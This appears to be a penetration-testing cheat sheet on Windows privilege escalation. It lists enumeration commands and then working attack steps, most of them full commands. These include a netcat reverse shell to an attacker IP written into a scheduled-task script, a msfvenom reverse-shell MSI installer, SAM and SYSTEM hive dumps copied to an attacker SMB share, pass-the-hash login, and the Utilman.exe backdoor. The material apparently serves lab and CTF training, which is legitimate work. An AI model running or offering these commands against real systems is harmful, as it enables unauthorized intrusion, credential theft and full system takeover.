In the Open
In the Open

Windows Privilege Escalation

Account Types

  • Administrator local & domain
  • Standard local & domain
  • Guest
  • System, local system, final escalation
  • Local Service, got anonymous connections over network.
  • Network Service, default service account, authentication via network

Enumeration

Users & Groups

whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta

Files

System

hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  • Installed software, check for existing exploits
wmic product get name,version,vendor
  • Services
wmic service list brief | findstr  "Running"

Exploit

DLL Hijacking

Unquoted Service Path

Token Impersonation

  • SeImpersonatePrivilege is necessary, check via whoami priv
  • Hot Potato is best before Server 2019 and Windows 10 (version 1809)
  • Potatos
  • itm4n

Schedules Tasks

  • schtasks and schtasks /query /tn %TASK_NAME% /fo list /v
  • Autoruns64.exe

MSI Elevated Installer

Search for Credentials

cmdkey /list
  • Use found credentials
runas /savecred /user:<user> reverse_shell.exe
  • Keys containing passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

accesschk64 Permissions

  • Check access to files and folders
accesschk64 -wvu "file.exe"
  • If permission SERVICE_CHANGE_CONFIG is set
 sc config <service> binpath="net localgroup administrators user /add"
  • Service escalation
  • Any other binary works as well. Copy the compiled portable executable from the service_escalation onto the binary path.Restart the service afterwards.

accesschk64 for Services

accesschk64 -qlc "service.exe"
  • If permission SERVICE_ALL_ACCESS is set it is configurable upload a reverse shell
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
  • Reconfigure and restart service
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService

Startup Application

  • Put reverse shell instead of an executable inside C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Password Mining

  • Set up metasploit
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
  • Visit site on target

Unattended Windows Installation

  • Investigate the following paths to potentially find user credentials
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
  • Watch out for the <Credentials> tags

Powershell History file

Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Internet Information Services (IIS)

  • Default web server on windows
  • Paths containing credentials are the following
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Putty

  • Saved proxy password credentials may be found via
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s

schtask and icacls

  • Check schtasks /query /tn %TASK_NAME% /fo list /v
  • Check script for scheduled tasks, F means full access
icacls <PathToScript>
  • Put payload inside the script
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>
  • Run the task
schtasks /run /tn <taskname>

Always Installs Elevated

  • These should be set
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
  • Craft *.msi file with a payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
  • Upload and execute via
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi

Service Misconfiguration

  • Check services, watch out for BINARY_PATH_NAME and SERVICE_START_NAME
sc qc apphostsvc
  • Check found permissions via
icacls <BINARY_PATH_NAME>
  • If the service binary path is writeable move the payload to its path and grant permissions
icacls <Payload_Service.exe> /grant Everyone:F

sc stop <service>
sc start <service>
  • Catch the reverse shell service

Others ways are: * Discretionary Access Control (DACL) can be opened via right click on the service and go to properties * All services are stored under HKLM\SYSTEM\CurrentControlSet\Services\

Unquoted Service Path

  • If BINARY_PATH_NAME spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
  • A created directory at install time inherits the permissions from its parent. Check it via
icacls <directory>
  • Use service-exe payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
  • Set permissions
icacls C:\Path/to/service.exe /grant Everyone:F

Permissions

SeBackup / Restore

  • If SeBackup / SeRestore (rw on all files) is set an elevated cmd.exe may be opened
  • Download SAM and System hashes
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam    C:\Windows\Temp\sam.hive
  • Start smb server on attack machine
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
  • Dump the hashes
secretsdump.py -sam sam.hive -system system.hive LOCAL
  • Use pass the hash to login 
psexec.py -hashes <hash> administrator@$TARGET_IP

SeTakeOwnership

  • If SeTakeOwnership is set one can take ownership of every file or service.
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe
  • Log out, on the Login screen click on Ease of Access

SeImpersonate / SeAssignPrimaryToken

  • It is a rouge potato
  • Execute process as another user
  • Service accounts operate through impersonation
  • Check privileges via whoami /priv for these
  • Object Exporter Identifier (OXID) is executed as via DCOM as a resolver on port 135 to socket of attacker
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
  • Catch the potatoe executable from target via netcat